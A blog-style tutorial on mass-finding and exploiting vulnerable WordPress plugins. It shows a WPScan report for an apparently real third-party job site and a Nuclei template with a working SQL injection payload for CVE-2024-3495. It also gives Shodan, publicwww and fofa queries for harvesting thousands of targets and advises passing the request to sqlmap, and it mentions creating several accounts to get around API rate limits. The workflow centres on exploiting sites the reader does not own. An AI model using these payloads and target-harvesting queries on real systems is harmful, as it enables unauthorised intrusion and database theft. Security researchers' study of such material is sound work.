Post

Exploiting WordPress (Known vulnerabilities)

Finding & exploiting known vulnerabilities in WordPress websites, Finding the targets & enumerating sub-domains.

Posted Updated
Contact form 7
Contact form 7
By
8 min read

Thanks for visiting! Over the past few weeks, I’ve been dedicating my time to discovering and analyzing vulnerabilities in WordPress websites, while also exploring various tools specifically designed for WordPress security testing. Throughout this journey, I’ve come across numerous insightful blogs and valuable resources shared by leading researchers in the field.

As many of us know, WordPress is a free and open-source content management system (CMS) built with PHP and backed by a MySQL or MariaDB database. It features a robust plugin architecture and a flexible template system. With a remarkable 78% market share, WordPress powers approximately 3.9 million websites—making it the most widely used CMS platform today.

CMS Statistics

You can go through the official WordPress documentation to understand its structure, or, from a security perspective, you can visit Patchstack academy to explore the detailed WordPress ecosystem, including plugins and themes. The vulnerabilities are explained very well here.

Another valuable resource for identifying and understanding WordPress vulnerabilities is WPScan, the official WordPress vulnerability database. WPScan also functions as a black-box vulnerability scanner and is distributed as a Ruby gem. It comes pre-installed on several security-focused Linux distributions such as Kali Linux, BlackArch, and Pentoo.

With the right combination of tools and reconnaissance techniques, it’s possible to uncover a significant number of vulnerable WordPress installations. Some of the key tools and resources I’ve utilized during these assessments include:

For example, we’ll try to find websites running the WordPress plugin wp-jobsearch < 2.3.4, which is vulnerable to authentication bypass and is associated with CVE-2023-6584. There are two different approaches you can try: first, if you have a running WordPress website, you can run WPScan with an API token against the site (make sure you are authorized to do so).

Second, you can use Google search operators to find targets running WordPress. Below is a demo vulnerability report for a single website.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91

sudo wpscan --api-token WuXM*** --url https://wordpress.com --force --random-user-agent --disable-tls-checks -f cli -o wp-pci-report.txt

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://jobs.*.co.in/ [141.*.*.182]
[+] Started: Sat Sep 21 10:57:12 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: https://jobs.*.co.in/robots.txt
 | Interesting Entries:
 |  - /wp-content/uploads/wc-logs/
 |  - /wp-content/uploads/woocommerce_transient_files/
 |  - /wp-content/uploads/woocommerce_uploads/
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://jobs.*.co.in/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] wp-jobsearch
 | Location: https://jobs.*.co.in/wp-content/plugins/wp-jobsearch/
 | Last Updated: 2024-09-21T00:10:54.000Z
 | [!] The version is out of date, the latest version is 2.6.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | [!] 7 vulnerabilities identified:
 |
 | [!] Title: JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE
 |     Fixed in: 2.3.4
 |     References:
 |      - https://wpscan.com/vulnerability/757412f4-e4f8-4007-8e3b-639a72b33180
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6585
 |
 | [!] Title: JobSearch WP Job Board < 2.3.4 - Authentication Bypass
 |     Fixed in: 2.3.4
 |     References:
 |      - https://wpscan.com/vulnerability/e528e3cd-a45c-4bf7-a37a-101f5c257acd
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6584
 |
 | [!] Title: JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover
 |     References:
 |      - https://wpscan.com/vulnerability/16899f0d-5a0f-46cd-97f6-c778d643faac
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43245
 |      - https://patchstack.com/database/vulnerability/wp-jobsearch/wordpress-jobsearch-plugin-2-3-4-unauthenticated-account-takeover-vulnerability
 |

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 11
 | Requests Remaining: 3

[+] Finished: Sat Sep 21 11:00:32 2024
[+] Requests Done: 1490
[+] Cached Requests: 9
[+] Data Sent: 486.062 KB
[+] Data Received: 31.157 MB
[+] Memory used: 265.246 MB
[+] Elapsed time: 00:03:20

So here the Website is vulnerable to authenticated/unauthenticated vulnerabilities & if we look at the result there is one finding we can see with the title JobSearch WP Job Board < 2.3.4 - Authentication Bypass having CVE-2023-6584.
This is the exploit code that needs to be run on the browser console

Exploit code

It allows attacker to log-in as any users with the only knowledge of that user’s email address. Complexity of the attack is low and does not require technical experties. So to find the legitimate email of the admin we can enumerate the login panel or we can use WPIntel browser extension.

Please refer the video poc of the same.

Another method we can use is source code search engines to find vulnerable WordPress websites. I also suggest keeping an eye on new Nuclei templates for WordPress submitted by the community. Let’s explore one of the templates, CVE-2023-3495 (WordPress Country State City Dropdown <= 2.7.2 - SQL Injection), which has a critical severity with a score of 9.8. This template detects the Country State City Dropdown CF7 plugin for WordPress, which is vulnerable to SQL Injection via the ‘cnt’ and ‘sid’ parameters in versions up to, and including, 2.7.2, due to insufficient escaping of user-supplied parameters.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

  id: CVE-2024-3495
  
  info:
    name: Wordpress Country State City Dropdown <=2.7.2 - SQL Injection
    author: apple
    severity: critical
    description: |
      The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
    reference:
      - https://sploitus.com/exploit?id=EDF4B3F8-DDF4-5196-A375-EC81B8BC18F1&utm_source=rss&utm_medium=rss
      - https://github.com/truonghuuphuc/CVE-2024-3495-Poc
      - https://nvd.nist.gov/vuln/detail/CVE-2024-3495
      - https://plugins.trac.wordpress.org/browser/country-state-city-auto-dropdown/trunk/includes/ajax-actions.php#L22
      - https://plugins.trac.wordpress.org/browser/country-state-city-auto-dropdown/trunk/includes/ajax-actions.php#L8
    classification:
      cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
      cvss-score: 9.8
      cve-id: CVE-2024-3495
      cwe-id: CWE-89
      epss-score: 0.00065
      epss-percentile: 0.28393
    metadata:
      verified: true
      max-request: 2
      publicwww-query: "/wp-content/plugins/country-state-city-auto-dropdown"
    tags: cve,cve2024,wp,wp-plugin,wordpress,sqli
  
  variables:
    num: "999999999"
  
  http:
    - raw:
        - |
          GET / HTTP/1.1
          Host: 
  
        - |
          POST /wp-admin/admin-ajax.php HTTP/1.1
          Host: 
          Content-Type: application/x-www-form-urlencoded
  
          action=tc_csca_get_cities&nonce_ajax=&sid=1+or+0+union+select+concat(0x64617461626173653a,(select%20md5()),0x7c76657273696f6e3a,(select%20md5()),0x7c757365723a,user()),2,3--+-
  
      matchers:
        - type: word
          part: body_2
          words:
            - ''
  
      extractors:
        - type: regex
          name: nonce
          group: 1
          regex:
            - '"nonce":"(\S*)"'
          internal: true
  # digest: 4a0a00473045022059c57bd6c82e74ce84c99c339ccc1b107f2cb6aec5fa053b73b7f1aaa77003ac022100d3b0c3a42c10b8421de519da2237f3784bfd8b8a8d01f55fc6b08c58c59860c8:922c64590222798bb761d5b6d8e72950

If you look closely at the template, it includes a publicwww query that can be used to find more targets. Some queries I’ve used to find these targets are:

1
2
3
4

  depth:all "country-state-city-auto-dropdown" - **publicwww**
  "/wp-content/plugins/country-state-city-auto-dropdown" - **publicwww**
  http.html:"/wp-content/plugins/country-state-city-auto-dropdown/" - **shodan**
  body="/wp-content/plugins/country-state-city-auto-dropdown/" - **fofa**

These queries will give thousands of urls. You can put those URLs to httpx for technology detection and availabilty.

Or you can feed these URLs to nuclei, With -dreq switch of nuclei we’ll be able to see the actual HTTP request used to exploit that vulnerability. For this post I’m putting a result of a single website below. (You can give list as arg)

HTTP request

Exploiting further we can manually inject queries or feed this request to sqlmap by putting * at the injection point. Here the vulnerable parameter is sid.

sqlmap

Another last alternative to mass scan targets for all known vulnerabilities is to use WPwatcher (Not covering installation here) WP Watcher is a wrapper for WPScan that manages scans on multiple sites and reports by email and/or syslog. Schedule scans and get notified when vulnerabilities, outdated plugins and other risks are found. You can refer the official documentation here.

Note: If you run WPscan or WPwatcher against target without the API token then it won’t show up the vulnerabilities. You’ve to register yourself on https://wpscan.com & grab the API token from profile section which will allow your scan to perform 23 requests per day. I created three accounts with three different emails to get more number of requests

This is the sample WPwatcher result for reference

WPwatcher

I hope you found this post helpful. Please find some reference links below for further reading.

Vulnerabilities
CVE Injection Vulnerability WordPress
This post is licensed under CC BY 4.0 by the author.